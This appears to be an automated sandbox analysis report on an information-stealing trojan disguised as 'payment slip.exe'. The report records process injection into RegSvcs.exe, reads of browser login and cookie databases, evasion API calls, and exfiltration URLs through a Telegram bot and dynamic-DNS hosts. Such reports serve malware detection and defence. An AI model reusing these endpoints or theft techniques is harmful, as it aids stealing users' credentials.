Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696492231f
Source: RegSvcs.exe, 00000002.00000002.3838901959.00000000007D7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696492231
Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696492231j
Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696492231o
Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05F49548 LdrInitializeThunk, 2_2_05F49548
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_000AEAA2 BlockInput, 0_2_000AEAA2
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_00062622 IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, 0_2_00062622
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_000342DE GetVersionExW, GetCurrentProcess, IsWow64Process, LoadLibraryA, GetProcAddress, GetNativeSystemInfo, FreeLibrary, GetSystemInfo, GetSystemInfo, 0_2_000342DE
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_00054CE8 mov eax, dword ptr fs:[00000030h], 0_2_00054CE8
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_03B03500 mov eax, dword ptr fs:[00000030h], 0_2_03B03500
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_03B034A0 mov eax, dword ptr fs:[00000030h], 0_2_03B034A0
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_03B01E70 mov eax, dword ptr fs:[00000030h], 0_2_03B01E70
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_00090B62 GetSecurityDescriptorDacl, GetAclInformation, GetLengthSid, GetLengthSid, GetAce, AddAce, GetLengthSid, GetProcessHeap, HeapAlloc, GetLengthSid, CopySid, AddAce, SetSecurityDescriptorDacl, SetUserObjectSecurity, HeapFree, GetProcessHeap, HeapFree, GetProcessHeap, HeapFree, GetProcessHeap, HeapFree, GetProcessHeap, HeapFree, 0_2_00090B62
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_0005083F IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, 0_2_0005083F
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_000509D5 SetUnhandledExceptionFilter, 0_2_000509D5
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_00050C21 SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, 0_2_00050C21
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\payment slip.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\Desktop\payment slip.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 3E7008
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_00091201 LogonUserW, DuplicateTokenEx, CloseHandle, OpenWindowStationW, GetProcessWindowStation, SetProcessWindowStation, OpenDesktopW, _wcslen, LoadUserProfileW, CreateEnvironmentBlock, CreateProcessAsUserW, UnloadUserProfile, GetProcessHeap, HeapFree, CloseWindowStation, CloseDesktop, SetProcessWindowStation, CloseHandle, DestroyEnvironmentBlock, 0_2_00091201
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_00072BA5 SetCurrentDirectoryW, GetForegroundWindow, ShellExecuteW, 0_2_00072BA5
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_0009B226 SendInput, keybd_event, 0_2_0009B226
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_000B22DA GetForegroundWindow, GetDesktopWindow, GetWindowRect, mouse_event, GetCursorPos, mouse_event, 0_2_000B22DA
Source: C:\Users\user\Desktop\payment slip.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\payment slip.exe"
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_00090B62 GetSecurityDescriptorDacl, GetAclInformation, GetLengthSid, GetLengthSid, GetAce, AddAce, GetLengthSid, GetProcessHeap, HeapAlloc, GetLengthSid, CopySid, AddAce, SetSecurityDescriptorDacl, SetUserObjectSecurity, HeapFree, GetProcessHeap, HeapFree, GetProcessHeap, HeapFree, GetProcessHeap, HeapFree, GetProcessHeap, HeapFree, 0_2_00090B62
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_00091663 AllocateAndInitializeSid, CheckTokenMembership, FreeSid, 0_2_00091663
Source: payment slip.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: payment slip.exe | Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_00050698 cpuid, 0_2_00050698
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_000A8195 GetLocalTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetCurrentDirectoryW, SetCurrentDirectoryW, SetCurrentDirectoryW, SetCurrentDirectoryW, SetCurrentDirectoryW, SetCurrentDirectoryW, 0_2_000A8195
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_0008D27A GetUserNameW, 0_2_0008D27A
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_0006B952 _free, _free, _free, GetTimeZoneInformation, WideCharToMultiByte, WideCharToMultiByte, _free, 0_2_0006B952
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_000342DE GetVersionExW, GetCurrentProcess, IsWow64Process, LoadLibraryA, GetProcAddress, GetNativeSystemInfo, FreeLibrary, GetSystemInfo, GetSystemInfo, 0_2_000342DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 00000002.00000002.3839548945.0000000002521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.RegSvcs.exe.580000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.payment slip.exe.3b10000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.payment slip.exe.3b10000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: payment slip.exe PID: 6736, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 1104, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: payment slip.exe | Binary or memory string: WIN_81
Source: payment slip.exe | Binary or memory string: WIN_XP
Source: payment slip.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: payment slip.exe | Binary or memory string: WIN_XPe
Source: payment slip.exe | Binary or memory string: WIN_VISTA
Source: payment slip.exe | Binary or memory string: WIN_7
Source: payment slip.exe | Binary or memory string: WIN_8

Remote Access Functionality

Source: Yara match | File source: 00000002.00000002.3839548945.0000000002521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.RegSvcs.exe.580000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.payment slip.exe.3b10000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.payment slip.exe.3b10000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: payment slip.exe PID: 6736, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 1104, type: MEMORYSTR
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_000B1204 socket, WSAGetLastError, bind, WSAGetLastError, closesocket, listen, WSAGetLastError, closesocket, 0_2_000B1204
Source: C:\Users\user\Desktop\payment slip.exe | Code function: 0_2_000B1806 socket, WSAGetLastError, bind, WSAGetLastError, closesocket, 0_2_000B1806
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 11 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 2 Valid Accounts | 3 Obfuscated Files or Information | Security Account Manager | 1 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 21 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 127 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 1 Non-Standard Port | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 212 Process Injection | 2 Valid Accounts | LSA Secrets | 221 Security Software Discovery | SSH | 3 Clipboard Data | 3 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 111 Virtualization/Sandbox Evasion | Cached Domain Credentials | 111 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | 24 Application Layer Protocol | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Access Token Manipulation | DCSync | 2 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 212 Process Injection | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Network Configuration Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

Source | Detection | Scanner | Label
payment slip.exe | 24% | ReversingLabs | Win32.Trojan.ShellcodeCrypter
payment slip.exe | 23% | Virustotal |
payment slip.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
reallyfreegeoip.org | 0% | Virustotal |
api.telegram.org | 2% | Virustotal |
mail.tradolgt.com | 1% | Virustotal |
checkip.dyndns.com | 0% | Virustotal |
checkip.dyndns.org | 0% | Virustotal |
Source | Detection | Scanner | Label
http://checkip.dyndns.org | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://reallyfreegeoip.org/xml/8.46.123.33 | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
http://crl.m | 0% | URL Reputation | safe
http://checkip.dyndns.org/ | 0% | URL Reputation | safe
https://reallyfreegeoip.org/xml/8.46.123.33$ | 0% | URL Reputation | safe
http://x1.c.lencr.org/0 | 0% | URL Reputation | safe
http://x1.i.lencr.org/0 | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
http://checkip.dyndns.org/q | 0% | URL Reputation | safe
https://reallyfreegeoip.org | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
https://reallyfreegeoip.org/xml/ | 0% | URL Reputation | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
https://api.telegram.org | 0% | Avira URL Cloud | safe
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
https://www.office.com/ | 0% | Virustotal |
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
https://www.office.com/ | 0% | Avira URL Cloud | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Virustotal |
https://duckduckgo.com/ac/?q= | 0% | Virustotal |
https://duckduckgo.com/chrome_newtab | 0% | Virustotal |
https://www.office.com/lB | 0% | Avira URL Cloud | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot | 0% | Avira URL Cloud | safe
http://r11.o.lencr.org0# | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20and%20Time:%2031/07/2024%20/%2018:11:57%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot/sendMessage?chat_id=&text= | 0% | Avira URL Cloud | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Virustotal |
https://chrome.google.com/webstore?hl=en | 0% | Avira URL Cloud | safe
https://www.office.com/lB | 0% | Virustotal |
https://api.telegram.org/bot | 1% | Virustotal |
http://varders.kozow.com:8081 | 0% | Avira URL Cloud | safe
http://r11.i.lencr.org/0 | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot/sendMessage?chat_id=&text= | 0% | Virustotal |
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20a | 0% | Avira URL Cloud | safe
http://varders.kozow.com:8081 | 15% | Virustotal |
http://aborters.duckdns.org:8081 | 0% | Avira URL Cloud | safe
http://r11.i.lencr.org/0 | 0% | Virustotal |
http://51.38.247.67:8081/_send_.php?L | 0% | Avira URL Cloud | safe
http://anotherarmy.dns.army:8081 | 100% | Avira URL Cloud | malware
https://chrome.google.com/webstore?hl=en | 0% | Virustotal |
https://api.telegram.org | 1% | Virustotal |
https://chrome.google.com/webstore?hl=enlB | 0% | Avira URL Cloud | safe
http://51.38.247.67:8081/_send_.php?L | 3% | Virustotal |
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | 0% | Avira URL Cloud | safe
http://aborters.duckdns.org:8081 | 12% | Virustotal |
http://anotherarmy.dns.army:8081 | 15% | Virustotal |
http://mail.tradolgt.com | 1% | Virustotal |
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
reallyfreegeoip.org | 188.114.96.3 | true | true | | unknown
api.telegram.org | 149.154.167.220 | true | true | | unknown
mail.tradolgt.com | 208.91.199.115 | true | true | | unknown
checkip.dyndns.com | 132.226.247.73 | true | false | | unknown
checkip.dyndns.org | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20and%20Time:%2031/07/2024%20/%2018:11:57%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | Avira URL Cloud: safe | unknown
https://reallyfreegeoip.org/xml/8.46.123.33 | false | URL Reputation: safe | unknown
http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.office.com/ | RegSvcs.exe, 00000002.00000002.3839548945.00000000026E6000.00000004.00000800.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://duckduckgo.com/chrome_newtab | RegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | RegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://api.telegram.org | RegSvcs.exe, 00000002.00000002.3839548945.0000000002606000.00000004.00000800.00020000.00000000.sdmp | false | 1% Virustotal; Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | RegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://r11.o.lencr.org0# | RegSvcs.exe, 00000002.00000002.3839058817.000000000088C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002721000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3842461304.0000000005978000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot | payment slip.exe, 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3839548945.0000000002606000.00000004.00000800.00020000.00000000.sdmp | false | 1% Virustotal; Avira URL Cloud: safe | unknown
https://www.office.com/lB | RegSvcs.exe, 00000002.00000002.3839548945.00000000026E1000.00000004.00000800.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | RegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://checkip.dyndns.org | RegSvcs.exe, 00000002.00000002.3839548945.0000000002521000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | RegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text= | RegSvcs.exe, 00000002.00000002.3839548945.0000000002606000.00000004.00000800.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://chrome.google.com/webstore?hl=en | RegSvcs.exe, 00000002.00000002.3839548945.00000000026B5000.00000004.00000800.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | RegSvcs.exe, 00000002.00000002.3841238839.000000000382F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3841238839.0000000003541000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
